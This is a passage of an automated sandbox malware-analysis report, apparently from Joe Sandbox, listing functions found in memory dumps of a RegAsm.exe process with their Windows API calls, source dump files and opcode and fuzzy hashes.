Instruction ID: 2c1fe79436986a2e7654ac082239cd450edf0d2e58f033a43423cf0ff3b37736
Opcode Fuzzy Hash: 3d34bf434e63a5faef3fc9b7c697fc389e5b42db09544698e9d1ecfd5913fb38
Instruction Fuzzy Hash: 90416371E106498FDB21CFA8C880BDEBFF1AF49340F29806AE949AB350D7349905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012BB88C, Relevance: 1.6, APIs: 1, Instructions: 95registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 012BB961

Memory Dump Source

Source File: 00000016.00000002.1038789849.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12b0000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 7407c24df3805c8a6d7f2a8f39c70ddf075935a823f230d01ccb4310d205205b
Instruction ID: 7a1a7d2715330b64313ca1579545c5179b2ac8b0fa1bfb7d57d5c2d91d13ca39
Opcode Fuzzy Hash: 7407c24df3805c8a6d7f2a8f39c70ddf075935a823f230d01ccb4310d205205b
Instruction Fuzzy Hash: 8B41EFB1D10658DFCB20CFAAC880ADEBFF5BF49750F25802AE859AB210C7749905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012BB8A8, Relevance: 1.6, APIs: 1, Instructions: 85registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 012BB961

Memory Dump Source

Source File: 00000016.00000002.1038789849.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12b0000_RegAsm.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: d2c139bdbb6d0a65614ee619a542c9d888284a274516cce38ebe9a512f6a8551
Instruction ID: 7caa0adc48321b416145044cc25fec8625fda1f186aa8a25feafcdc49cfa5b87
Opcode Fuzzy Hash: d2c139bdbb6d0a65614ee619a542c9d888284a274516cce38ebe9a512f6a8551
Instruction Fuzzy Hash: 8831CDB1D106589BCB20CFAAC884ACEBBF5BB48750F24802AE919AB310D7749905CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00F065F0, Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 8ec90c3c7d2a433fed0b4199b3be05d12641d86af76f651ab9aaa309043f941b
Instruction ID: 8ea749b270abf41f5db03ff1018dd39a5c294bfe0483c10ff782ab3d01bf3cae
Opcode Fuzzy Hash: 8ec90c3c7d2a433fed0b4199b3be05d12641d86af76f651ab9aaa309043f941b
Instruction Fuzzy Hash: 51218372E08206DEEF395A10C95C7B436E1EF12339FB9965AC952CA0D0C77588F4BB12

Uniqueness

Uniqueness Score: -1.00%

Function 012BB5E4, Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 012BB6A4

Memory Dump Source

Source File: 00000016.00000002.1038789849.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12b0000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 93436414466b7a3005d1264f017cfc6b924e8575754c0899b6a03e7bdb93112e
Instruction ID: c8e7dae7a1141ac5ac316c0913ee4f04ac0b0be4db5a7a4cdaacd77bfb524917
Opcode Fuzzy Hash: 93436414466b7a3005d1264f017cfc6b924e8575754c0899b6a03e7bdb93112e
Instruction Fuzzy Hash: 99311EB0D102498FDB10CF99C184ACEFFF5BF49314F28816AE808AB300D7759985CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F049B0, Relevance: 1.6, APIs: 1, Instructions: 81libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8e45323d69534f8f465573fc2be3c18097063ec7ca53e63beb5857be5f4225ac
Instruction ID: 44c2b8364d6dd7e2f2eed376553347f3df363acce41a6fd9a380fd271fdbb17d
Opcode Fuzzy Hash: 8e45323d69534f8f465573fc2be3c18097063ec7ca53e63beb5857be5f4225ac
Instruction Fuzzy Hash: B7113AE6FC4406EECE216D544E827BE7269FE50322F340269E793460C1E25DF5947A8E

Uniqueness

Uniqueness Score: -1.00%

Function 012BB5F0, Relevance: 1.6, APIs: 1, Instructions: 80registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000000,?,00000001,?), ref: 012BB6A4

Memory Dump Source

Source File: 00000016.00000002.1038789849.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_12b0000_RegAsm.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 531bddc077620ed507dcc3f983e36807ef4a9bf27223890c65b8555a587e23f0
Instruction ID: 53bb427802ee3a5cac4025f7e05283e22bb58aa8aed61932ec26ae54e0247fa6
Opcode Fuzzy Hash: 531bddc077620ed507dcc3f983e36807ef4a9bf27223890c65b8555a587e23f0
Instruction Fuzzy Hash: 2F31FDB0D102498FDB10CF99C584ACEFFF5BF48304F28816AE809AB340C7759989CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F01F1A, Relevance: 1.6, APIs: 1, Instructions: 78threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00F01F4A

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 6fcb2ff496fb2bd16679d76299d08e8007849caac7f983af46f631818e75cb33
Instruction ID: 78ab0fb6dbb897643bbd8f1d7e7b1c5bc69f02691612bd9d60b550b516cd4ca6
Opcode Fuzzy Hash: 6fcb2ff496fb2bd16679d76299d08e8007849caac7f983af46f631818e75cb33
Instruction Fuzzy Hash: F7216AB5504311AFDB209B58CDC6BA9335AEF0D3B0F714251EC52971D1C375C981B526

Uniqueness

Uniqueness Score: -1.00%

Function 00F06686, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 2123bbe0ec1d23ea234f54c8e7f4a6200ad8f1a6d6962931e60eadb59144d61f
Instruction ID: 2da60fedce28b15ed4b2f8001b9f9af7d96857a53f11f17f1cb04e92816e7f06
Opcode Fuzzy Hash: 2123bbe0ec1d23ea234f54c8e7f4a6200ad8f1a6d6962931e60eadb59144d61f
Instruction Fuzzy Hash: 4C217272E08306CEEF255A1088183B477E1AF12328FA9969AC812CA0E1D73188F5F752

Uniqueness

Uniqueness Score: -1.00%

Function 00F043DB, Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00F04411

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c51ec60bab96ce87298bdfbdc6c83ffb8a59012add4847d271ebd36ab5af7e66
Instruction ID: 6b533c9192a08cf95200cc0cb32fb23f5e1f9a8d4819548f6a8c258f9463434f
Opcode Fuzzy Hash: c51ec60bab96ce87298bdfbdc6c83ffb8a59012add4847d271ebd36ab5af7e66
Instruction Fuzzy Hash: 9E1104F7908501AEDF24EA208E46BB677A4BF62310F5C0549EF82831C6E3297C50B712

Uniqueness

Uniqueness Score: -1.00%

Function 00F04A47, Relevance: 1.6, APIs: 1, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 14d156b43644bc9c471e3b6307be58cd49c5d3abd632fd4eca29193b4840a798
Instruction ID: af4ecfda6a893f5b342ebdd407410588dc90d27fcad4e56d917a3436f1f84e05
Opcode Fuzzy Hash: 14d156b43644bc9c471e3b6307be58cd49c5d3abd632fd4eca29193b4840a798
Instruction Fuzzy Hash: 6E0166F7B4450ADECE11AD404E427AAF3A9BD843127680165EB9347081D32CF074BB8D

Uniqueness

Uniqueness Score: -1.00%

Function 0138E0A0, Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0138DC1A), ref: 0138E10F

Memory Dump Source

Source File: 00000016.00000002.1039147002.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1380000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: b7aff2ad07675812ea3b89aea88a9d0c52619c0c57c24282cfbcd3753e959a7f
Instruction ID: ca2190e0d2914b075c6beeb6259e9f0df226eacdf1f393d2f1420b615087bfbc
Opcode Fuzzy Hash: b7aff2ad07675812ea3b89aea88a9d0c52619c0c57c24282cfbcd3753e959a7f
Instruction Fuzzy Hash: CB1133B1D006599BCB10CFAAC845BDEFBF4BB09324F11812AD814A7600D378AA45CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F04AC2, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 05ceea6b615be07ac7dec0737e249503f9f1e89d16c0887045e70dfffdc9c229
Instruction ID: 36869aba63d6c106183c774d636fc3037c93580e8467dbd5e7ec7a79dc4c17f7
Opcode Fuzzy Hash: 05ceea6b615be07ac7dec0737e249503f9f1e89d16c0887045e70dfffdc9c229
Instruction Fuzzy Hash: 6601F4E7F4080DDBCE202D000E873A9F3F5BDD5323B7802A0C7A257885922AF5A57685

Uniqueness

Uniqueness Score: -1.00%

Function 01385984, Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,0138DC1A), ref: 0138E10F

Memory Dump Source

Source File: 00000016.00000002.1039147002.0000000001380000.00000040.00000001.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1380000_RegAsm.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: c028476cbcf6bd63a1c299490ca3a34e22f3ef83c684f58dfa8538955bd9bf6a
Instruction ID: 94f2f3fc27c59f03d81553044cde4e0fa2c52258ebe63b73213678395f8ae9c2
Opcode Fuzzy Hash: c028476cbcf6bd63a1c299490ca3a34e22f3ef83c684f58dfa8538955bd9bf6a
Instruction Fuzzy Hash: A61100B1D006199BCB10DF9AC844BDEFBF4AB49224F15812AE818B7640D378A949CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 00F04A2A, Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 52ecab33404bc021c9a14849a638d5b17fa8454c9fef9ca110a0a24617b5a81b
Instruction ID: 757f3442e591c671e00e019bc6f0f66e35efc452c7577c9cae1dd83d46e94f99
Opcode Fuzzy Hash: 52ecab33404bc021c9a14849a638d5b17fa8454c9fef9ca110a0a24617b5a81b
Instruction Fuzzy Hash: C6F028E6B84106DBCE207D904E417BE7264EE91320F744266EB53460D1C32CF0547ACF

Uniqueness

Uniqueness Score: -1.00%

Function 00F04A73, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6b0fda77df17784410624d7e12f21ec86e955e9090032456f8873a53e6f53cb8
Instruction ID: 4fe696228bd4618eb404bf644a9113545c18632e6019800ed7e7e9e9ca0d6b98
Opcode Fuzzy Hash: 6b0fda77df17784410624d7e12f21ec86e955e9090032456f8873a53e6f53cb8
Instruction Fuzzy Hash: 78F0F4EAE4460ADECE112E400A563A9F668BC813237B40169DB9207581D22EB130B749

Uniqueness

Uniqueness Score: -1.00%

Function 00F04A3D, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 92a28ba483709ec807db12a4fd6377a48bfe28630fb03ae8ce1d14fb09241a67
Instruction ID: e91c857454fe985239797a8b42a59212e36d2c9f506cc987df98b1c58ccfa9fd
Opcode Fuzzy Hash: 92a28ba483709ec807db12a4fd6377a48bfe28630fb03ae8ce1d14fb09241a67
Instruction Fuzzy Hash: C8F0E2DA78810ADACE303DA14E917BEB268CE91720F704667EF53860C1C26CF454368F

Uniqueness

Uniqueness Score: -1.00%

Function 00F0675A, Relevance: 1.5, APIs: 1, Instructions: 38COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 82391d091ad883ff18cb5729b292c57ac62d9a57f12a4f84dfcb45d41377e242
Instruction ID: 43b81fd077f911c181d63db28ff9ae4d99d5d59f190733cee2fe778cd89f3742
Opcode Fuzzy Hash: 82391d091ad883ff18cb5729b292c57ac62d9a57f12a4f84dfcb45d41377e242
Instruction Fuzzy Hash: 4FF08262F58206CEEF2A6E108D483F827F2ED173287AC465ACD52DA5E0D72144F5B382

Uniqueness

Uniqueness Score: -1.00%

Function 00F04AA4, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: a170a67910ce562ba253494ad4706aa440acb9692fb0199205838b1e4ec04f99
Instruction ID: fda87981f7854a3fba00005e2a3e204d6b97f69175ed6a287fcb774ec9281888
Opcode Fuzzy Hash: a170a67910ce562ba253494ad4706aa440acb9692fb0199205838b1e4ec04f99
Instruction Fuzzy Hash: 47F0E2FAF40106DACE25BE044E973ACF360EDD0363BB4402ADB534B084D229F420BA45

Uniqueness

Uniqueness Score: -1.00%

Function 00F0677C, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: a6e462ea324192b81e025fe12afb5ec1ae6325c8468e4f50293dd2afd1c8e6e2
Instruction ID: 6e93fbccbc77dea7dcbc70e1084a14eed354e4b12d1d10ed40bf9ac2b4f78482
Opcode Fuzzy Hash: a6e462ea324192b81e025fe12afb5ec1ae6325c8468e4f50293dd2afd1c8e6e2
Instruction Fuzzy Hash: B8F08972F04606DDEF295D008D4A3A4B6E1FD453257AD856DC953D24C4D72254B4B742

Uniqueness

Uniqueness Score: -1.00%

Function 00F0681F, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 895a231811ce6a063759fa192c89cc0c2fe9e9e5796db8b39c7358d1d3254613
Instruction ID: 68d234c085d4d9c6f43051739ea6d1b53eec42e149d2970b2edbb38f8c2424af
Opcode Fuzzy Hash: 895a231811ce6a063759fa192c89cc0c2fe9e9e5796db8b39c7358d1d3254613
Instruction Fuzzy Hash: ECE0D8B1E04211D9EF2D99108D4E3A8B7E5FD48326BA4863DC993C24C4D62540B5B752

Uniqueness

Uniqueness Score: -1.00%

Function 00F067A2, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(?,?,?,?,?,?), ref: 00F067DC

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 0d8ee90998177050ebd53cb5ee0a093c4cbb12e72249538bd0485ad3dcf49ba2
Instruction ID: e15051ced087e8ed1b0f58fa1b5c610e8d1d85f816b6b6dcdbea8ea72eda919e
Opcode Fuzzy Hash: 0d8ee90998177050ebd53cb5ee0a093c4cbb12e72249538bd0485ad3dcf49ba2
Instruction Fuzzy Hash: F2E0D872E04606CADF295D108D893A872E5BD413257A8866DC853D24C0D52140F5B392

Uniqueness

Uniqueness Score: -1.00%

Function 00F04330, Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00F04411

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: daf1d6391b95ec0964c459abdd9af94b7e14c59028af9b3771f87500f46de380
Instruction ID: 20e8296c4b9bbb7d6e2b5d1c1fcf4262c0fead8d1f4b36019cfc2363a84bf78b
Opcode Fuzzy Hash: daf1d6391b95ec0964c459abdd9af94b7e14c59028af9b3771f87500f46de380
Instruction Fuzzy Hash: C8F020B6808642DFCA04CB009D86BA5F7B8BF04305F118040DBC787581E3327835FB12

Uniqueness

Uniqueness Score: -1.00%

Function 00F04390, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00F04411

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: c8b2a28f40b7a6e03028c23dd388d10441ca330218195fa6e2b7b46faba829a2
Instruction ID: e6532810357b47cd3dabb60320870a8909212724fc26453aa5bc808510f6f87f
Opcode Fuzzy Hash: c8b2a28f40b7a6e03028c23dd388d10441ca330218195fa6e2b7b46faba829a2
Instruction Fuzzy Hash: 5DE04FFA900A06E9DA64D9008E8BBB5F278BF24342F604064DFC79258597223875BA25

Uniqueness

Uniqueness Score: -1.00%

Function 00F043A8, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00F04411

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 30b54c1f65652cf5b6f80fc06bd5cc6573efc49c0061c385883190ffc59b7bab
Instruction ID: e38d38fc8e11ecafa9f44fb63c340053d452ad7f1883e18a00be9b66517b4498
Opcode Fuzzy Hash: 30b54c1f65652cf5b6f80fc06bd5cc6573efc49c0061c385883190ffc59b7bab
Instruction Fuzzy Hash: BEE08CF6A04604DECA54DA008E8AB7AB2B4BF40702F214000EB87C3481E3327874BA22

Uniqueness

Uniqueness Score: -1.00%

Function 00F043C0, Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00F04411

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 063478b0bbec792e30bbaa2ae008d79df262572e711fd7c8a0f09dd076576702
Instruction ID: 4cb143ecf45bb1103b5144d8adb387c2b758435d4347af5487bf1b6abb636eb3
Opcode Fuzzy Hash: 063478b0bbec792e30bbaa2ae008d79df262572e711fd7c8a0f09dd076576702
Instruction Fuzzy Hash: 14D017B6A04201EACA94CA00CD9AB6AB268BB90305F214415EB87C7189C3307860FA22

Uniqueness

Uniqueness Score: -1.00%

Function 00F049D9, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,00000000), ref: 00F04AED

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f97c119e05b6dddb9f4c306fb180b41bf5873e10452bc04fffe5b2f15468c2e3
Instruction ID: 0707cc3fce72af97f4771db67be250628da6da239fe400733a284c734265751c
Opcode Fuzzy Hash: f97c119e05b6dddb9f4c306fb180b41bf5873e10452bc04fffe5b2f15468c2e3
Instruction Fuzzy Hash: 57C012C5544252BCCE343E514C597BB2515DE60361BA1456AFB53810C1862CF880B559

Uniqueness

Uniqueness Score: -1.00%

Function 00F043A6, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNEL32(?,?,00000200), ref: 00F04411

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 1fb6458cfc1dad55b41e1489582be0ce84cd10770d290491f995e507b984df4b
Instruction ID: 27c8140d37288ce27ee566780ebb645486295d8cafb66f490e655b7a6eb4cb19
Opcode Fuzzy Hash: 1fb6458cfc1dad55b41e1489582be0ce84cd10770d290491f995e507b984df4b
Instruction Fuzzy Hash: 65D0C9B2208300EADA64D6509D84BBA62A4AB90740F216406EF8BC74C5D730B854B652

Uniqueness

Uniqueness Score: -1.00%

Function 00F03B2E, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a5cc11f4660b6c0a63e85e4076ab4bdc64a690513a77ca76ad91f56f7e5b6e
Instruction ID: 8085288a6118aba43f40d084ce31df46b22d76b14bdb36782cff560a6665a277
Opcode Fuzzy Hash: 68a5cc11f4660b6c0a63e85e4076ab4bdc64a690513a77ca76ad91f56f7e5b6e
Instruction Fuzzy Hash: 4EC0C0AA00024C07F200B13084017CFB3CADFE3FA8B3F0042805207061EA02090CF1FC

Uniqueness

Uniqueness Score: -1.00%

Function 00F030A8, Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00F03070,00F0310B), ref: 00F030D8

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1cacc71feb68c964f6ae05737e7ebed3be4d9ed7d699def80231263da6b2f910
Instruction ID: 4542612768dcd949b912b8d51bab82f4b203f21572e2c47773676baa079c1f03
Opcode Fuzzy Hash: 1cacc71feb68c964f6ae05737e7ebed3be4d9ed7d699def80231263da6b2f910
Instruction Fuzzy Hash: 23D08C353D0340B6F9349A109C16FA522098B80F00FB0850A7B4A2E0C401F17690E12E

Uniqueness

Uniqueness Score: -1.00%

Function 00F03B24, Relevance: 1.5, APIs: 1, Instructions: 7libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(?), ref: 00F03B47

Memory Dump Source

Source File: 00000016.00000002.1036340354.0000000000F01000.00000040.00000001.sdmp, Offset: 00F01000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_f01000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e62acb3c76e9046357b0d5b38bb656fa9e3ab2998d64dfaab96b62744d00bd21
Instruction ID: 1bc24d3c093e5ac830c0b92b76ad70ba7910b2d4a974628dbff8689e1d011a7f
Opcode Fuzzy Hash: e62acb3c76e9046357b0d5b38bb656fa9e3ab2998d64dfaab96b62744d00bd21
Instruction Fuzzy Hash: BEB012F224005C23C4A07315050534A22490BD1342FB4C004B5354718DCE29872D33E0

Uniqueness

Uniqueness Score: -1.00%

Function 1D7CD450, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000016.00000002.1046551782.000000001D7CD000.00000040.00000001.sdmp, Offset: 1D7CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_1d7cd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9db6273254cbe8dd29b6dfd1366b564542169fc08900618ae0336c83021271c
Instruction ID: d798e0ade18acfa76e201dc42d1790f39ea9908e3c2a14b10aa521086b0abef2
Opcode Fuzzy Hash: f9db6273254cbe8dd29b6dfd1366b564542169fc08900618ae0336c83021271c
Instruction Fuzzy Hash: 2821F5B1504241DFDB05DF18D8C0F27BB65FB88724F24C56AED094B246C376E956CBA2

